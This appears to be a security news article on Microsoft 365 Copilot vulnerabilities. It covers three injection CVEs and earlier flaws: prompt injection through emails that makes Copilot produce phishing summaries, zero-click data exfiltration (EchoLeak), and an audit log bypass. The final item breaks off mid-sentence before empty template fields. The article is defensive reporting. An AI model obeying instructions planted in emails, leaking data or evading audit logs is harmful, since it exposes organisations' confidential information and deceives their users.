Critical Vulnerabilities in Microsoft 365 Copilot Expose Sensitive Information
Microsoft has recently addressed three critical vulnerabilities within its Microsoft 365 Copilot and Copilot Chat in Microsoft Edge, all disclosed on May 7, 2026. These flaws, identified as CVE-2026-26129, CVE-2026-26164, and CVE-2026-33111, posed significant risks by potentially allowing unauthorized access to sensitive information.
Overview of the Vulnerabilities
1. CVE-2026-26129: This vulnerability affected the Business Chat feature of Microsoft 365 Copilot. It involved improper neutralization of special elements in output used by downstream components, which could enable unauthorized attackers to disclose sensitive information over a network. Although specific CVSS metrics were not provided, the critical severity rating underscores the high confidentiality risk due to Copilot’s extensive access to enterprise data.
2. CVE-2026-26164: Also impacting Microsoft 365 Copilot, this flaw was classified under CWE-74 (Improper Neutralization of Special Elements in Output Used by a Downstream Component — Injection). The vulnerability was network-based, required no privileges or user interaction, and had a high confidentiality impact. Microsoft assessed the likelihood of exploitation as Less Likely, with exploit code maturity listed as unproven.
3. CVE-2026-33111: This issue affected Copilot Chat embedded in Microsoft Edge and was categorized under CWE-77 (Improper Neutralization of Special Elements Used in a Command — Command Injection). Similar to CVE-2026-26164, it was network-accessible, required no privileges or user interaction, and had a high confidentiality impact. Given the widespread use of Edge in enterprise environments, this vulnerability was particularly concerning.
Implications for Organizations
The integration of AI-powered tools like Microsoft 365 Copilot into daily workflows has streamlined tasks but also introduced new security challenges. These vulnerabilities highlight the unique risks associated with AI-driven productivity tools that aggregate and process vast amounts of organizational data, including emails, documents, and Teams conversations. Exploitation of such flaws could lead to unauthorized access to intellectual property, confidential communications, and restricted internal records.
Microsoft’s Response and Recommendations
Microsoft has fully mitigated these vulnerabilities at the service layer, requiring no action from end users or administrators. This proactive approach aligns with Microsoft’s commitment to transparency in its cloud services, as outlined in their Toward Greater Transparency: Unveiling Cloud Service CVEs program.
The company credited Estevam Arantes of Microsoft for discovering both CVE-2026-26129 and CVE-2026-26164, with additional credit to independent researcher 0xSombra for CVE-2026-26164. No acknowledgment was listed for CVE-2026-33111. Microsoft confirmed that none of these vulnerabilities were publicly disclosed or actively exploited prior to their publication.
Broader Context of Microsoft 365 Copilot Vulnerabilities
These recent disclosures are part of a series of security challenges identified in Microsoft 365 Copilot over the past year:
– Email Summarization Flaw: A security flaw in Microsoft 365 Copilot caused the AI assistant to incorrectly summarize email messages protected by confidentiality sensitivity labels, bypassing configured Data Loss Prevention (DLP) policies and exposing potentially sensitive organizational data to unauthorized AI processing. This issue, tracked under Microsoft reference CW1226324, was first flagged on February 4, 2026, and remains ongoing. Microsoft’s investigation identified a code-level defect as the root cause, allowing Copilot to inadvertently pick up items stored in users’ Sent Items and Draft folders, bypassing the confidentiality labels applied to those messages. As of February 11, 2026, Microsoft began deploying a fix across affected environments and is reaching out to a subset of impacted users to validate impact remediation. However, the rollout has not yet reached full saturation, and the issue remains unresolved for some organizations. Microsoft aims to provide a remediation timeline as the fix progresses. The scope of impact is broad; any organization with Microsoft 365 Copilot enabled and confidentiality labels configured on email could be affected. ([cybersecuritynews.com](https://cybersecuritynews.com/microsoft-365-copilot-bug/amp/?utm_source=openai))
– Cross-Prompt Injection Vulnerability (CVE-2026-26133): Researchers at Permiso Security disclosed a critical cross-prompt injection vulnerability in Microsoft 365 Copilot’s email summarization surfaces. This flaw allowed attackers to embed malicious instructions within emails, causing Copilot to generate convincing phishing content within its trusted summary interface. Microsoft confirmed the issue on January 28, 2026, began rolling out mitigations on February 17, completed the patch across all affected surfaces on March 11, and published the CVE on March 12, 2026, crediting Andi Ahmeti of Permiso Security for the discovery. ([cybersecuritynews.com](https://cybersecuritynews.com/microsoft-copilot-summarization-vulnerability/?utm_source=openai))
– Zero-Click Vulnerability (EchoLeak): A critical zero-click vulnerability in Microsoft 365 Copilot, dubbed EchoLeak, enabled attackers to exfiltrate sensitive organizational data without requiring any user interaction. The attack exploited design flaws in how Copilot processes and retrieves information from organizational data stores, allowing external attackers to send specially crafted emails that bypass multiple security layers. This vulnerability was particularly dangerous due to its zero-click nature, operating entirely in the background. ([cybersecuritynews.com](https://cybersecuritynews.com/zero-click-microsoft-365-copilot-vulnerability/?utm_source=openai))
– Audit Log Bypass: A significant security vulnerability was discovered in Microsoft’s Copilot for M365 that allowed users, including potential malicious insiders, to access and interact with sensitive files without leaving any record in the official audit logs. After patching the flaw, Microsoft reportedly decided against issuing a formal CVE or notifying its customers, leaving organizations unaware that their security logs from before the fix may be critically incomplete. ([cybersecuritynews.com](https://cybersecuritynews.com/copilot-vulnerability-breaks-audit-logs/amp/?utm_source=openai))
– Prompt Injection Vulnerability: A sophisticated vulnerability in Microsoft 365 Copilot allowed attackers to steal sensitive tenant data, including recent emails, through indirect prompt injection attacks. The
Article X Post:
Hashtags:
Article Key Phrase:
Category: Security News
